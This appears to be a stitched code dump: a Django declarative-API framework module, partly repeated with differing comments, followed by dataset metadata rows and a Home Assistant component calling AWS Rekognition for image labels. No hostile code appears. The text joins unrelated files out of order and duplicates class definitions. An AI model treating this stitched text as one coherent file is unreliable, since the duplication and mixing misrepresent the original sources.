        except Exception as e:  # pragma: nocover
            # Anything unexpected becomes a generic server error.
            raise errors.ServerError() from e

    def __call__(self, *args, **kwargs):
        return self.process_request_and_get_response(*args, **kwargs)

    def __str__(self):  # pragma: nocover
        return self.endpoint_manager_names

    @property
    def documentation(self):
        return [definition.documentation() for definition in self.endpoint_definitions]
class EndpointDefinitionMixin(metaclass=EndpointDefinitionMeta):
    """Marker base for mixins that declare endpoint attributes.

    Applies the attribute-naming metaclass without imposing
    BaseEndpointDefinition's abstract interface.
    """

    pass
class BaseEndpointDefinition(metaclass=EndpointDefinitionMeta):
    """Abstract contract for declarative endpoint definitions.

    Subclasses declare endpoint attributes (fields, tasks, URL fields) as
    class members; the classmethods below introspect those declarations.
    """

    @abc.abstractmethod
    def is_authorized(self):
        """Authorization check. Should be overridden by endpoint definition
        implementations.

        Returns:
            ``bool``: Whether or not the user should be able to access the
            resource. Defaults to ``False``.
        """
        return False

    def is_permitted(self):
        """Permission check; override to restrict access. Defaults to True."""
        return True

    def is_valid(self):
        """Request validity check; override to add custom validation."""
        return True

    def rate_limit_key(self):
        """Return a unique key used for rate-limiting requests to this
        endpoint, or None if the request should not be rate-limited."""
        return None

    def rate_limit_period(self):
        """Number of seconds to enforce between requests with the same
        rate_limit_key."""
        return 1

    @property
    def response_filter(self):
        """Default response filter, resolved from settings when configured."""
        filter_def_name = getattr(
            settings, "DECLARATIVE_ENDPOINT_DEFAULT_FILTERS", None
        )
        return locate_object(filter_def_name) if filter_def_name else {}

    @property
    def http_status(self):
        """HTTP status code reported on success."""
        return http.client.OK

    @property
    @abc.abstractmethod
    def resource(self):
        """The instance of a resource. Should either be a ``dict`` or an
        instance of a Django Model or QuerySet. Must be implemented by all
        endpoint definitions."""
        raise NotImplementedError("Endpoints must implement self.resource property")

    @property
    def response(self):
        """Response payload; defaults to the resource itself."""
        return self.resource

    @classmethod
    def get_endpoint_attributes(cls):
        """All EndpointAttribute declarations, ordered by declaration number."""
        attributes = [
            attr
            for attr in (getattr(cls, name) for name in dir(cls))
            if isinstance(attr, EndpointAttribute)
        ]
        attributes.sort(key=lambda attr: attr.attribute_number)
        return attributes

    @classmethod
    def get_request_properties(cls):
        """All declared RequestProperty attributes."""
        return [
            attr
            for attr in cls.get_endpoint_attributes()
            if isinstance(attr, RequestProperty)
        ]

    @classmethod
    def get_required_request_properties(cls):
        """Request properties marked as required."""
        return [prop for prop in cls.get_request_properties() if prop.required]

    @classmethod
    def get_request_fields(cls):
        """Request properties that are RequestFields."""
        return [
            prop
            for prop in cls.get_request_properties()
            if isinstance(prop, RequestField)
        ]

    @classmethod
    def get_resource_fields(cls):
        """Request properties that are ResourceFields."""
        return [
            prop
            for prop in cls.get_request_properties()
            if isinstance(prop, ResourceField)
        ]

    @classmethod
    def get_required_request_fields(cls):
        """Required request properties that are RequestFields."""
        return [
            prop
            for prop in cls.get_required_request_properties()
            if isinstance(prop, RequestField)
        ]

    @classmethod
    def get_tasks(cls):
        """All declared EndpointTasks, sorted by ascending priority."""
        tasks = [
            attr
            for attr in cls.get_endpoint_attributes()
            if isinstance(attr, EndpointTask)
        ]
        tasks.sort(key=lambda task: task.priority)
        return tasks

    @classmethod
    def get_url_fields(cls):
        """All declared RequestUrlFields."""
        return [
            attr
            for attr in cls.get_endpoint_attributes()
            if isinstance(attr, RequestUrlField)
        ]

    @classmethod
    def documentation(cls):
        """Machine-readable description of the endpoint's fields."""
        return {
            "class_name": cls.__name__,
            "fields": [prop.documentation for prop in cls.get_request_properties()],
        }

    @classmethod
    def get_adhoc_queries(cls):
        """All declared RequestAdhocQuerySet attributes."""
        return [
            attr
            for attr in cls.get_endpoint_attributes()
            if isinstance(attr, RequestAdhocQuerySet)
        ]
class EndpointDefinition(BaseEndpointDefinition):
    """Base class for endpoint definitions not necessarily tied to a model.

    Adds raw-request access plus simple consumer-based authorization:
    read-only consumers may only perform GETs unless the endpoint is
    explicitly marked read-only.
    """

    request = RawRequestObjectProperty()
    _consumer_type = ConsumerAttribute(field_name="type", default="RW")

    # When True, any consumer type may invoke this endpoint regardless of
    # HTTP method.
    is_read_only = False

    def is_permitted(self):
        """Return whether the current consumer may access this endpoint."""
        if (
            self._consumer_type is None
            or self._consumer_type == BaseConsumer.TYPE_READ_WRITE
        ):
            return True
        if self._consumer_type != BaseConsumer.TYPE_READ_ONLY:
            # Unknown consumer types are rejected outright.
            return False
        # Read-only consumers: allow read-only endpoints and GET requests.
        if self.is_read_only or self.request.method == "GET":
            return True
        self._validation_error_message = "Action not allowed for read-only consumer"
        return False

    @classmethod
    def get_consumer_attributes(cls):
        """Request properties that are ConsumerAttributes."""
        return [
            prop
            for prop in cls.get_request_properties()
            if isinstance(prop, ConsumerAttribute)
        ]

    @classmethod
    def get_consumer_type(cls):
        """Name of the single declared consumer attribute, or "unknown"."""
        attrs = cls.get_consumer_attributes()
        if len(attrs) == 1:
            return attrs[0].name
        return "unknown"

    @classmethod
    def documentation(cls):
        docs = super().documentation()
        docs["consumer_type"] = cls.get_consumer_type()
        return docs
class ResourceCreationMixin(object):
    """Mixin for creation endpoints: report 201 Created instead of 200 OK."""

    @property
    def http_status(self):
        return http.client.CREATED
class ResourceEndpointDefinition(EndpointDefinition):
    """ A base class to be used when defining endpoints bound to models.
    """

    consumer = RequestAttribute()
    resource_id = RequestUrlField(
        name="id", description="UUID of the resource to retrieve"
    )
    """ The ID of the resource being fetched or updated.
    """

    resource_model = None
    """ The model to attach to the resource endpoint definition.

    Must extend or implement the Django ORM model interface as required.
    """

    def __init__(self, *args, **kwargs):
        # Extra positional/keyword args are accepted but intentionally unused.
        super(ResourceEndpointDefinition, self).__init__()
        self._cached_resource = None

    @property
    def resource(self):
        """ Resource implementation

        Queries the object manager of `self.resource_model` for the given
        id (`self.resource_id`). The result is cached after the first
        successful lookup, so subsequent accesses do not hit the database.
        """
        if not self._cached_resource:
            self._cached_resource = self.resource_model.objects.get(id=self.resource_id)
        return self._cached_resource
class ResourceUpdateEndpointDefinition(ResourceEndpointDefinition):
    """Resource endpoint that applies declared request fields onto the model."""

    @EndpointTask(priority=-100)
    def mutate(self):
        """Copy every non-None declared resource field onto the resource."""
        resource = self.resource
        for field in self.get_resource_fields():
            new_value = getattr(self, field.name)
            if new_value is not None:
                setattr(resource, field.name, new_value)

    @EndpointTask(priority=-101)
    def validate_input(self):
        """Reject request bodies containing fields this endpoint never declared."""
        # Touch the resource so a missing instance surfaces during validation
        # (runs before mutate: -101 sorts ahead of -100).
        resource = self.resource  # noqa: F841
        expected_fields = {field.name for field in self.get_resource_fields()} | {
            field.name for field in self.get_request_fields()
        }
        unexpected = self.request.body_field_names - expected_fields
        if unexpected:
            raise errors.ClientErrorUnprocessableEntity(
                "Unexpected fields: {}".format(", ".join(unexpected))
            )
# Public lowercase aliases: the declarative surface used by endpoint
# definitions (e.g. `machinery.field(...)`, `@machinery.task`).
task = EndpointTask
deferrable_task = DeferrableEndpointTask
request_attribute = RequestAttribute
consumer_attribute = ConsumerAttribute
field = RequestField
resource_field = ResourceField
url_field = RequestUrlField
adhoc_queryset = RequestAdhocQuerySet
aggregate = Aggregate
require_one = RequireOneAttribute
require_all = RequireAllAttribute
require_all_if_any = RequireAllIfAnyAttribute
endpoint_resource = EndpointResourceAttribute
endpoint_response = EndpointResponseAttribute
| 34.671687 | 110 | 0.636391 |
import abc
import http.client
import itertools
import logging
import sys
import django
from django.conf import settings
from django.db import models
from django.http import HttpResponse
from django_declarative_apis.machinery.filtering import apply_filters_to_object
from django_declarative_apis.models import BaseConsumer
from django_declarative_apis.resources.utils import HttpStatusCode
from . import errors
from .attributes import (
Aggregate,
ConsumerAttribute,
DeferrableEndpointTask,
EndpointAttribute,
EndpointTask,
RawRequestObjectProperty,
RequestAdhocQuerySet,
RequestAttribute,
RequestField,
RequestProperty,
RequestUrlField,
RequireAllAttribute,
RequireAllIfAnyAttribute,
RequireOneAttribute,
ResourceField,
)
from .attributes import TypedEndpointAttributeMixin, RequestFieldGroup
from .utils import locate_object, rate_limit_exceeded
logger = logging.getLogger(__name__)
class EndpointResourceAttribute(EndpointAttribute):
    """Decorator attribute that resolves the endpoint's primary resource.

    Wraps a getter function; an ``ObjectDoesNotExist`` raised by the getter
    is translated into a 404 client error naming ``type``.
    """

    def __init__(self, type, filter=None, returns_list=False, **kwargs):
        super(EndpointResourceAttribute, self).__init__(**kwargs)
        self.type = type
        self.filter = filter
        self.func = None
        self.returns_list = returns_list

    def __call__(self, func):
        # Decorator form: capture the getter, keep returning the descriptor.
        self.func = func
        return self

    def get_instance_value(self, owner_instance, owner_class):
        if not owner_instance:
            # Class-level access yields the descriptor itself.
            return self
        try:
            value = self.func(owner_instance)
        except django.core.exceptions.ObjectDoesNotExist:
            raise errors.ClientErrorNotFound(
                "{0} instance not found".format(self.type.__name__)
            )
        # Plain dict responses pass through unfiltered.
        if value.__class__ == dict:
            return value
        if not getattr(value, "_api_filter", False):
            value._api_filter = self.filter
        return value
class EndpointResponseAttribute(EndpointAttribute):
    """Decorator attribute that produces the endpoint's response payload."""

    def __init__(self, type, filter=None, **kwargs):
        super(EndpointResponseAttribute, self).__init__(**kwargs)
        self.type = type
        self.filter = filter
        self.func = None

    def __call__(self, func):
        # Decorator form: capture the getter, keep returning the descriptor.
        self.func = func
        return self

    def get_instance_value(self, owner_instance, owner_class):
        if not owner_instance:
            return self
        value = self.func(owner_instance)
        if not getattr(value, "_api_filter", False):
            # Only attach a filter when one was actually configured.
            if self.filter:
                value._api_filter = self.filter
        return value
class EndpointDefinitionMeta(abc.ABCMeta, metaclass=abc.ABCMeta):
    """Metaclass that back-fills ``name`` on declared endpoint attributes.

    Walks the MRO so attributes declared on parent classes are named too.
    """

    def __init__(cls, class_name, bases=None, dict=None):
        super(EndpointDefinitionMeta, cls).__init__(class_name, bases, dict)
        ancestor_attribs = (ancestor.__dict__.items() for ancestor in cls.mro())
        for name, attribute in itertools.chain(dict.items(), *ancestor_attribs):
            try:
                if not attribute.name:
                    attribute.name = name
            except AttributeError as e:  # noqa
                # Non-descriptor members (methods, plain values) have no
                # ``.name`` — skip them.
                pass
class EndpointBinder(object):
    """Binds an endpoint definition class to incoming HTTP requests.

    Collects the definition's declared attributes/fields/tasks once at
    construction, then produces a ``BoundEndpointManager`` per request.
    """

    class BoundEndpointManager(object):
        """Wraps one bound endpoint instance for a single request."""

        def __init__(self, manager, bound_endpoint):
            self.manager = manager
            self.bound_endpoint = bound_endpoint
            # sys.exc_info() tuples captured during binding/validation;
            # re-raised lazily by get_response().
            self.binding_exc_info = None
            self.validation_exc_info = None

        def get_response(self):
            """Run endpoint tasks and return ``(status_code, payload)``."""
            error = self.binding_exc_info or self.validation_exc_info
            if error:
                exc_type, exc_value, exc_traceback = error
                if isinstance(exc_value, errors.ClientError):
                    logger.warning(exc_value.error_message)
                else:
                    logger.error(str(exc_value.args) + "\n" + str(exc_traceback))
                raise exc_value.with_traceback(exc_traceback)
            resource = self.bound_endpoint.resource
            # Persist changes made during binding before any task runs.
            if hasattr(resource, "is_dirty"):
                if resource and resource.is_dirty(check_relationship=True):
                    resource.save()
            endpoint_tasks = sorted(
                self.manager.endpoint_tasks, key=lambda t: t.priority
            )
            immediate_tasks = filter(
                lambda t: not isinstance(t, DeferrableEndpointTask), endpoint_tasks
            )
            deferred_tasks = filter(
                lambda t: isinstance(t, DeferrableEndpointTask), endpoint_tasks
            )
            try:
                for immediate_task in immediate_tasks:
                    immediate_task.run(self.bound_endpoint)
            except errors.ClientError as ce:
                # Some client errors still want partial changes persisted.
                if ce.save_changes and resource and resource.is_dirty():
                    resource.save()
                raise
            # Save again: immediate tasks may have mutated the resource.
            if hasattr(resource, "is_dirty"):
                if resource and resource.is_dirty(check_relationship=True):
                    resource.save()
            for deferred_task in deferred_tasks:
                deferred_task.run(self.bound_endpoint)
            # A filter attached to the resource wins over the endpoint default.
            if getattr(resource, "_api_filter", False):
                filter_def = resource._api_filter
            else:
                filter_def = self.bound_endpoint.response_filter
            data = self.bound_endpoint.response
            status_code = self.bound_endpoint.http_status
            if isinstance(data, HttpResponse):
                if 200 <= status_code <= 299:
                    return status_code, data
                else:
                    raise HttpStatusCode(data)
            elif isinstance(data, dict):
                # Filter each element of list-like values; pass scalars through.
                result = {}
                for key, value in data.items():
                    if isinstance(value, (list, tuple, models.query.QuerySet)):
                        result[key] = []
                        for item in value:
                            result[key].append(
                                apply_filters_to_object(item, filter_def)
                            )
                    else:
                        result[key] = value
                return status_code, result
            else:
                return (
                    status_code,
                    apply_filters_to_object(
                        data,
                        filter_def,
                        self.bound_endpoint.request.META.get("HTTP_X_EXPAND"),
                    ),
                )

    def __init__(self, endpoint_definition):
        super(EndpointBinder, self).__init__()
        self.endpoint_definition = endpoint_definition
        # Cache the definition's declared metadata once per binder.
        self.endpoint_attributes = endpoint_definition.get_endpoint_attributes()
        self.request_properties = endpoint_definition.get_request_properties()
        self.required_request_properties = (
            endpoint_definition.get_required_request_properties()
        )
        try:
            self.consumer_attributes = endpoint_definition.get_consumer_attributes()
        except AttributeError:
            # Definitions without consumer support simply have none.
            self.consumer_attributes = []
        self.request_fields = endpoint_definition.get_request_fields()
        self.required_request_fields = endpoint_definition.get_required_request_fields()
        self.endpoint_tasks = endpoint_definition.get_tasks()
        self.url_fields = endpoint_definition.get_url_fields()
        self.adhoc_queries = endpoint_definition.get_adhoc_queries()

    def create_bound_endpoint(self, manager, request, *args, **kwargs):
        """Instantiate the endpoint and bind URL/query/request data onto it."""
        endpoint = self.endpoint_definition()
        for url_field in self.url_fields:
            if (url_field.api_name or url_field.name) in kwargs:
                url_field.set_value(kwargs.get(url_field.api_name or url_field.name))
        for adhoc_query_field in self.adhoc_queries:
            adhoc_query_field.set_value(
                {
                    key: val
                    for (key, val) in request.GET.items()
                    if key.startswith(adhoc_query_field.name)
                }
            )
        # Bind the request object within the instance so RequestProperties can
        # access it without the definition holding the request directly.
        RequestProperty.bind_request_to_instance(endpoint, request)
        bound_endpoint_manager = EndpointBinder.BoundEndpointManager(manager, endpoint)
        # Binding/validation errors are captured rather than raised so the
        # caller can fall back to other endpoint definitions.
        try:
            self._bind_endpoint(endpoint)
        except Exception as e:  # noqa
            bound_endpoint_manager.binding_exc_info = sys.exc_info()
            return bound_endpoint_manager
        try:
            self._validate_endpoint(endpoint)
        except Exception as e:  # noqa
            bound_endpoint_manager.validation_exc_info = sys.exc_info()
        return bound_endpoint_manager

    def _bind_endpoint(self, endpoint):
        # Access all request properties; this validates the request against
        # the definition and caches the resolved values.
        extra_error_message = ""
        missing_required_properties = []
        invalid_value_properties = []
        for request_property in self.request_properties:
            try:
                value = getattr(endpoint, request_property.name)
                if value is None and request_property.required:
                    if isinstance(request_property, ConsumerAttribute):
                        # A missing required consumer attribute fails fast.
                        raise errors.ClientErrorForbidden()
                    else:
                        # Collect missing properties; reported all together.
                        missing_required_properties.append(request_property)
            except errors.ClientErrorMissingFields as mfe:
                extra_error_message += mfe.error_message
            except (ValueError, errors.ClientErrorInvalidFieldValues) as ve:  # noqa
                # Collect invalid values; reported all together.
                invalid_value_properties.append(request_property)
        if missing_required_properties or extra_error_message:
            raise errors.ClientErrorMissingFields(
                [property.name for property in missing_required_properties],
                extra_message=extra_error_message,
            )
        if invalid_value_properties:
            raise errors.ClientErrorInvalidFieldValues(
                [request_property.name for request_property in invalid_value_properties]
            )

    def _validate_endpoint(self, endpoint):
        # Run the standard validators.
        try:
            if not (
                endpoint.is_authorized()
                and endpoint.is_permitted()
                and endpoint.is_valid()
            ):
                raise errors.ClientErrorForbidden(
                    additional_info=getattr(endpoint, "_validation_error_message", None)
                )
        except django.core.exceptions.ObjectDoesNotExist:
            raise errors.ClientErrorNotFound()
        # Rate-limit check.
        rate_limit_key = endpoint.rate_limit_key()
        if (rate_limit_key is not None) and rate_limit_exceeded(
            rate_limit_key, endpoint.rate_limit_period()
        ):
            raise errors.ClientErrorRequestThrottled()
class _EndpointRequestLifecycleManager(object):
    """Drives a single endpoint definition through bind -> execute -> respond."""

    def __init__(self, endpoint_definition):
        super(_EndpointRequestLifecycleManager, self).__init__()
        self.endpoint_definition = endpoint_definition
        self.binder = EndpointBinder(endpoint_definition)
        self.endpoint_tasks = endpoint_definition.get_tasks()

    def bind_endpoint_to_request(self, request, *args, **kwargs):
        # Returns an EndpointBinder.BoundEndpointManager for this request.
        return self.binder.create_bound_endpoint(self, request, *args, **kwargs)

    def process_request_and_get_response(self, request, *args, **kwargs):
        # Bind, execute tasks, and render: returns (status_code, payload).
        bound_endpoint = self.bind_endpoint_to_request(request, *args, **kwargs)
        return bound_endpoint.get_response()

    def __str__(self):
        return self.endpoint_definition.__name__
class BehavioralEndpointDefinitionRouter(object):
    """Routes one URL to the first endpoint definition that binds cleanly."""

    def __init__(self, *endpoint_definitions):
        super(BehavioralEndpointDefinitionRouter, self).__init__()
        self.endpoint_definitions = endpoint_definitions
        self.endpoint_managers = [
            _EndpointRequestLifecycleManager(endpoint)
            for endpoint in endpoint_definitions
        ]
        # Human-readable "(NameA,NameB)" label used by __str__.
        self.endpoint_manager_names = "({0})".format(
            ",".join(map(lambda e: e.__name__, endpoint_definitions))
        )

    def bind_endpoint_to_request(self, request, *args, **kwargs):
        # Try candidates in declaration order; the first that binds without
        # error wins. If all fail, the last bound manager (with its captured
        # binding error) is returned.
        bound_endpoint = None
        for candidate_endpoint_manager in self.endpoint_managers:
            bound_endpoint = candidate_endpoint_manager.bind_endpoint_to_request(
                request, *args, **kwargs
            )
            if bound_endpoint.binding_exc_info is None:
                break
        return bound_endpoint

    def process_request_and_get_response(self, request, *args, **kwargs):
        try:
            bound_endpoint = self.bind_endpoint_to_request(request, *args, **kwargs)
            logger.info(
                "Processing request with handler %s",
                bound_endpoint.bound_endpoint.__class__.__name__,
            )
            return bound_endpoint.get_response()
        except errors.ApiError:
            # API errors already carry HTTP semantics; propagate untouched.
            raise
        except Exception as e:
            # Anything unexpected becomes a generic server error.
            raise errors.ServerError() from e

    def __call__(self, *args, **kwargs):
        return self.process_request_and_get_response(*args, **kwargs)

    def __str__(self):
        return self.endpoint_manager_names

    @property
    def documentation(self):
        return [x.documentation() for x in self.endpoint_definitions]
class EndpointDefinitionMixin(metaclass=EndpointDefinitionMeta):
    """Empty base that applies EndpointDefinitionMeta, for classes meant to be
    mixed into endpoint definitions without providing endpoint behavior."""
    pass
class BaseEndpointDefinition(metaclass=EndpointDefinitionMeta):
    """Abstract base for declarative endpoint definitions.

    Subclasses declare EndpointAttribute instances as class attributes; the
    classmethods below enumerate and filter those declarations.
    """

    @abc.abstractmethod
    def is_authorized(self):
        """Whether the caller may access this endpoint; subclasses must decide."""
        return False

    def is_permitted(self):
        return True

    def is_valid(self):
        return True

    def rate_limit_key(self):
        """Key used for throttling; None disables rate limiting."""
        return None

    def rate_limit_period(self):
        """Rate-limit window passed to rate_limit_exceeded (units defined there)."""
        return 1

    @property
    def response_filter(self):
        """Default response filter, loaded from settings when configured."""
        filter_def_name = getattr(
            settings, "DECLARATIVE_ENDPOINT_DEFAULT_FILTERS", None
        )
        return locate_object(filter_def_name) if filter_def_name else {}

    @property
    def http_status(self):
        return http.client.OK

    @property
    @abc.abstractmethod
    def resource(self):
        raise NotImplementedError("Endpoints must implement self.resource property")

    @property
    def response(self):
        # By default the response is the resource itself.
        return self.resource

    @classmethod
    def get_endpoint_attributes(cls):
        """All EndpointAttribute declarations, ordered by declaration number."""
        attributes = [
            value
            for value in (getattr(cls, name) for name in dir(cls))
            if isinstance(value, EndpointAttribute)
        ]
        attributes.sort(key=lambda attribute: attribute.attribute_number)
        return attributes

    @classmethod
    def get_request_properties(cls):
        return [
            attribute
            for attribute in cls.get_endpoint_attributes()
            if isinstance(attribute, RequestProperty)
        ]

    @classmethod
    def get_required_request_properties(cls):
        return [prop for prop in cls.get_request_properties() if prop.required]

    @classmethod
    def get_request_fields(cls):
        return [
            prop
            for prop in cls.get_request_properties()
            if isinstance(prop, RequestField)
        ]

    @classmethod
    def get_resource_fields(cls):
        return [
            prop
            for prop in cls.get_request_properties()
            if isinstance(prop, ResourceField)
        ]

    @classmethod
    def get_required_request_fields(cls):
        return [
            prop
            for prop in cls.get_required_request_properties()
            if isinstance(prop, RequestField)
        ]

    @classmethod
    def get_tasks(cls):
        """EndpointTask declarations sorted by ascending priority."""
        return sorted(
            (
                attr
                for attr in cls.get_endpoint_attributes()
                if isinstance(attr, EndpointTask)
            ),
            key=lambda task: task.priority,
        )

    @classmethod
    def get_url_fields(cls):
        return [
            attr
            for attr in cls.get_endpoint_attributes()
            if isinstance(attr, RequestUrlField)
        ]

    @classmethod
    def documentation(cls):
        """Machine-readable description: class name plus per-field docs."""
        return {
            "class_name": cls.__name__,
            "fields": [prop.documentation for prop in cls.get_request_properties()],
        }

    @classmethod
    def get_adhoc_queries(cls):
        return [
            attr
            for attr in cls.get_endpoint_attributes()
            if isinstance(attr, RequestAdhocQuerySet)
        ]
class EndpointDefinition(BaseEndpointDefinition):
    """Endpoint base that enforces consumer-type (read-only vs. read-write)
    access rules on top of BaseEndpointDefinition."""
    request = RawRequestObjectProperty()
    # Consumer "type" attribute; defaults to read-write ("RW").
    _consumer_type = ConsumerAttribute(field_name="type", default="RW")
    # Subclasses set True to allow read-only consumers on non-GET methods.
    is_read_only = False
    def is_permitted(self):
        """Read-write consumers (or no consumer type) are always permitted;
        read-only consumers may only GET, unless the endpoint is marked
        is_read_only. Any other consumer type is denied."""
        if (
            self._consumer_type is None
            or self._consumer_type == BaseConsumer.TYPE_READ_WRITE
        ):
            return True
        if self._consumer_type == BaseConsumer.TYPE_READ_ONLY:
            if self.is_read_only:
                return True
            if self.request.method == "GET":
                return True
            else:
                # Message is picked up by _validate_endpoint via
                # _validation_error_message for the Forbidden response.
                self._validation_error_message = (
                    "Action not allowed for read-only consumer"
                )
                return False
        # Unknown consumer types are denied.
        return False
    @classmethod
    def get_consumer_attributes(cls):
        """Return the declared ConsumerAttribute request properties."""
        return list(
            filter(
                lambda property: isinstance(property, ConsumerAttribute),
                cls.get_request_properties(),
            )
        )
    @classmethod
    def get_consumer_type(cls):
        """Name of the single consumer attribute, or "unknown" when the class
        declares zero or several of them."""
        consumer_attribute = cls.get_consumer_attributes()
        if len(consumer_attribute) == 1:
            consumer_attribute = consumer_attribute[0]
            return consumer_attribute.name
        else:
            return "unknown"
    @classmethod
    def documentation(cls):
        docs = super().documentation()
        docs["consumer_type"] = cls.get_consumer_type()
        return docs
class ResourceCreationMixin(object):
    """Mixin that reports 201 Created as the endpoint's HTTP status."""

    @property
    def http_status(self):
        status = http.client.CREATED
        return status
class ResourceEndpointDefinition(EndpointDefinition):
    """Endpoint that operates on a single model instance looked up by URL id."""

    consumer = RequestAttribute()
    resource_id = RequestUrlField(
        name="id", description="UUID of the resource to retrieve"
    )
    # Subclasses must set this to the model class used for the lookup.
    resource_model = None

    def __init__(self, *args, **kwargs):
        super(ResourceEndpointDefinition, self).__init__()
        self._cached_resource = None

    @property
    def resource(self):
        """Fetch and memoize the model instance identified by resource_id.

        Raises the model's DoesNotExist when no matching row exists.
        """
        # Compare against None explicitly: the previous truthiness check would
        # re-fetch on every access if the cached resource were falsy.
        if self._cached_resource is None:
            self._cached_resource = self.resource_model.objects.get(id=self.resource_id)
        return self._cached_resource
class ResourceUpdateEndpointDefinition(ResourceEndpointDefinition):
    """Update endpoint: validates the request body, then copies declared
    resource fields onto the fetched model instance.

    Tasks run in ascending priority order (see get_tasks), so validate_input
    (-101) runs before mutate (-100).
    """
    @EndpointTask(priority=-100)
    def mutate(self):
        """Copy each non-None declared resource field onto the model."""
        resource = self.resource
        for resource_field in self.get_resource_fields():
            field_value = getattr(self, resource_field.name)
            # None means "field absent from the request"; leave model value.
            if field_value is not None:
                setattr(resource, resource_field.name, field_value)
    @EndpointTask(priority=-101)
    def validate_input(self):
        """Reject request bodies containing fields outside the declared set."""
        # Touching self.resource fetches the model, so a missing object
        # surfaces (as DoesNotExist -> 404) before field validation runs.
        resource = self.resource
        expected_fields = set(
            list(field.name for field in self.get_resource_fields())
            + list(field.name for field in self.get_request_fields())
        )
        unexpected = self.request.body_field_names - expected_fields
        if unexpected:
            raise errors.ClientErrorUnprocessableEntity(
                "Unexpected fields: {}".format(", ".join(unexpected))
            )
# Lowercase aliases: the public declarative-DSL names for the attribute and
# task classes defined above.
task = EndpointTask
deferrable_task = DeferrableEndpointTask
request_attribute = RequestAttribute
consumer_attribute = ConsumerAttribute
field = RequestField
resource_field = ResourceField
url_field = RequestUrlField
adhoc_queryset = RequestAdhocQuerySet
aggregate = Aggregate
require_one = RequireOneAttribute
require_all = RequireAllAttribute
require_all_if_any = RequireAllIfAnyAttribute
endpoint_resource = EndpointResourceAttribute
endpoint_response = EndpointResponseAttribute
| true | true |
f723407e65031fd351529c33894aad8210ea47d4 | 6,590 | py | Python | custom_components/aws_rekognition.py | youqingkui/home-assistant-config | 4973c5683f00efd0d3387d94aefd729352713dd3 | [
"MIT"
] | null | null | null | custom_components/aws_rekognition.py | youqingkui/home-assistant-config | 4973c5683f00efd0d3387d94aefd729352713dd3 | [
"MIT"
] | null | null | null | custom_components/aws_rekognition.py | youqingkui/home-assistant-config | 4973c5683f00efd0d3387d94aefd729352713dd3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/12/23 18:08
# @Author : youqingkui
# @File : aws_rekognition.py
# @Desc :
import asyncio
import json
import logging
import os
import aiohttp
from aiohttp.hdrs import CONTENT_TYPE
import async_timeout
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.loader import get_component
import boto3
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'aws_rekognition'
DEPENDENCIES = ['camera']
CONF_REGION = 'region_name'
CONF_ACCESS_KEY_ID = 'aws_access_key_id'
CONF_SECRET_ACCESS_KEY = 'aws_secret_access_key'
# AWS Rekognition API action names. The original values carried accidental
# trailing spaces on CreateCollection/ListCollections, which would never match
# the real action names.
SERVICE_CREATE_COLLECTION = 'CreateCollection'
SERVICE_LIST_COLLECTION = 'ListCollections'
SERVICE_DELETE_COLLECTION = 'DeleteCollection'
SERVICE_DETECT_FACE = 'DetectFaces'
# Component configuration: AWS region (default us-east-1), a required access
# key id, and an optional secret access key.
CONFIG_SCHEMA = vol.Schema({
    DOMAIN: vol.Schema({
        vol.Optional(CONF_REGION, default="us-east-1"): cv.string,
        vol.Required(CONF_ACCESS_KEY_ID): cv.string,
        vol.Optional(CONF_SECRET_ACCESS_KEY): cv.string
    }),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
    """Set up the AWS Rekognition component and register its services.

    Registers the 'detect_faces' (S3 object labeling) and 'face_person'
    (camera snapshot labeling) services. Returns True on success.
    """
    entity_id = 'aws_rekognition.last_message'
    conf = config[DOMAIN]
    # Do not log the raw component config: it contains the AWS access key id
    # and secret access key.
    face = AwsFace(hass, conf.get(CONF_ACCESS_KEY_ID),
                   conf.get(CONF_SECRET_ACCESS_KEY),
                   conf.get(CONF_REGION), entity_id)
    hass.services.register(DOMAIN, 'detect_faces', face.detect_faces)
    hass.services.register(DOMAIN, 'face_person', face.async_face_person)
    return True
class AwsFace(object):
    """Wraps a boto3 Rekognition client and provides the service handlers."""
    def __init__(self, hass, aws_access_key_id, aws_secret_access_key, region_name, entities):
        self.hass = hass
        self.aws_access_key_id = aws_access_key_id
        self.aws_secret_access_key = aws_secret_access_key
        self.region_name = region_name
        # Entity id that detect_faces() publishes its results to.
        self._entities = entities
        # NOTE(review): warning-level log of the region is noisy; consider debug.
        _LOGGER.warning(region_name)
        self.client = boto3.client(service_name='rekognition', region_name=self.region_name,
                                   aws_access_key_id=self.aws_access_key_id,
                                   aws_secret_access_key=self.aws_secret_access_key)
    def detect_faces(self, call):
        """Service handler: label detection on an S3 object.

        Reads 'bucket' and 'fileName' from the service call data, runs
        detect_labels (min confidence 75), publishes the labels to the
        configured entity, and returns the raw response (False on error).
        """
        bucket = call.data.get('bucket')
        fileName = call.data.get('fileName')
        try:
            response = self.client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': fileName}}, MinConfidence=75)
        except Exception as e:
            _LOGGER.error(e)
            return False
        _LOGGER.warning("response => %s" % response)
        Labels = response.get('Labels', [])
        self.hass.states.set(self._entities, Labels)
        return response
    @asyncio.coroutine
    def async_face_person(self, call):
        """Service handler: label detection on a camera snapshot.

        NOTE(review): passes the value from camera.async_get_image directly as
        the image bytes — confirm the installed camera component returns raw
        bytes rather than an Image wrapper object.
        """
        camera_entity = call.data['camera_entity']
        camera = get_component('camera')
        try:
            image = yield from camera.async_get_image(self.hass, camera_entity)
            response = self.client.detect_labels(
                Image={
                    'Bytes': image,
                }
            )
            _LOGGER.warning(response)
        except Exception as e:
            # Best-effort: failures are only logged; the service call still
            # completes without raising.
            _LOGGER.error(e)
# def setup(hass, config):
# """Set up microsoft face."""
# entity_id = 'aws_rekognition.last_message'
#
# def face_index(call):
# bucket = call.data.get('bucket')
# fileName = call.data.get('fileName')
# response = client.detect_labels(Image={'S3Object': {'Bucket': bucket, 'Name': fileName}}, MinConfidence=75)
# _LOGGER.warning("face_index => %s" % response)
# hass.states.set(entity_id, 'hello aws')
#
# hass.states.set(entity_id, 'No messages')
#
# hass.services.register(DOMAIN, 'set_state', face_index)
# return True
# class AwsFace(object):
# def __init__(self, hass, region_name, timeout, entities):
# self.hass = hass
# self.websession = async_get_clientsession(hass)
# self.timeout = timeout
# self._store = {}
# self._entities = entities
#
# @property
# def store(self):
# """Store group/person data and IDs."""
# return self._store
#
# @asyncio.coroutine
# def index_faces(self, image):
# response = client.index_faces(Image={'Bytes': image})
# return response
# @asyncio.coroutine
